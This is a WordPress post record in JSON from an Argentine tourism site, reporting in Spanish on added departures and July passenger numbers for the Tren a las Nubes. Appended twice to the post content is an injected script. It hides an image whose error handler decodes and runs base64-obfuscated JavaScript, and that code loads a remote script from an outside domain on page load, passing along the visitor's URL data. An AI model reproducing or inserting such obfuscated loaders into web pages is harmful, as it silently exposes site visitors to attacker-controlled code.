{"id":5362,"date":"2025-07-22T23:32:02","date_gmt":"2025-07-23T02:32:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5362"},"modified":"2025-08-13T23:24:21","modified_gmt":"2025-08-14T02:24:21","slug":"tren-a-las-nubes-mas-salidas-y-5-500-pasajeros-en-julio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5362","title":{"rendered":"Tren a las Nubes: m\u00e1s salidas y 5.500 pasajeros en julio"},"content":{"rendered":"\n<p><strong><em>En plena temporada de vacaciones de invierno, el Tren a las Nubes ha superado las expectativas de demanda y ampliado su cantidad de salidas para satisfacer el creciente inter\u00e9s de turistas. Con m\u00e1s de 5.500 pasajeros transportados en lo que va del mes de julio, la experiencia contin\u00faa consolid\u00e1ndose como una de las m\u00e1s elegidas por quienes visitan<\/em><\/strong><\/p>\n\n\n\n<p>En el marco de la temporada de vacaciones de invierno en Salta, el Tren a las Nubes consolida su posici\u00f3n como una de las experiencias tur\u00edsticas m\u00e1s elegidas del pa\u00eds.<\/p>\n\n\n\n<p>Durante julio, la demanda super\u00f3 las expectativas, lo que llev\u00f3 a esta emblem\u00e1tica experiencia a aumentar el n\u00famero de salidas programadas. De las 16 inicialmente previstas, se pas\u00f3 a 25 para poder atender el creciente inter\u00e9s de turistas nacionales e internacionales.<\/p>\n\n\n\n<p>Hasta el s\u00e1bado 19 de julio se realizaron 14 salidas transportando a m\u00e1s de 5.500 pasajeros solo en lo que va del mes. La pr\u00f3xima salida est\u00e1 programada para ma\u00f1ana martes 22 de julio.<\/p>\n\n\n\n<p>El emblem\u00e1tico recorrido, que atraviesa paisajes \u00fanicos del altiplano salte\u00f1o y culmina en el Viaducto La Polvorilla a m\u00e1s de 4.200 metros sobre el nivel del mar, sigue destac\u00e1ndose como una de las joyas del turismo mundial.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18473-vacaciones-de-invierno-el-tren-a-las-nubes-amplia-salidas-y-ya-transporto-mas-de-5500-pasajeros-en-lo-que-va-de-julio.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18473-vacaciones-de-invierno-el-tren-a-las-nubes-amplia-salidas-y-ya-transporto-mas-de-5500-pasajeros-en-lo-que-va-de-julio.webp\" alt=\"Vacaciones de invierno: el Tren a las Nubes ampl\u00eda salidas y ya transport\u00f3 m\u00e1s de 5.500 pasajeros en lo que va de julio\"\/><\/a><\/figure>\n\n\n\n<p>\u00abEsta temporada de invierno est\u00e1 siendo muy positiva para el Tren a las Nubes. El crecimiento en la cantidad de pasajeros y la ampliaci\u00f3n de salidas reflejan el enorme inter\u00e9s por vivir esta experiencia \u00fanica. Tambi\u00e9n &nbsp;es un reconocimiento al esfuerzo de todo nuestro equipo por ofrecer un servicio seguro y de calidad\u00bb, destac\u00f3&nbsp;<strong>Sebasti\u00e1n Vidal<\/strong>, presidente del Tren a las Nubes.<\/p>\n\n\n\n<p>Asimismo, se confirm\u00f3 que las pr\u00f3ximas salidas previstas para el resto de julio se realizar\u00e1n con total normalidad, garantizando siempre la seguridad y el disfrute de los pasajeros.<\/p>\n\n\n\n<p>El Tren a las Nubes sigue siendo uno de los \u00edconos tur\u00edsticos m\u00e1s importantes de Salta, combinando ingenier\u00eda, historia, cultura y naturaleza en una experiencia \u00fanica que, a\u00f1o tras a\u00f1o, conquista a miles de visitantes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En plena temporada de vacaciones de invierno, el Tren a las Nubes ha superado las expectativas de demanda y ampliado su cantidad de salidas para satisfacer el creciente inter\u00e9s de turistas. Con m\u00e1s de 5.500 pasajeros transportados en lo que va del mes de julio, la experiencia contin\u00faa consolid\u00e1ndose como una de las m\u00e1s elegidas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,18],"tags":[],"class_list":{"0":"post-5362","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5362"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5362"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5362\/revisions"}],"predecessor-version":[{"id":6432,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5362\/revisions\/6432"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5363"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}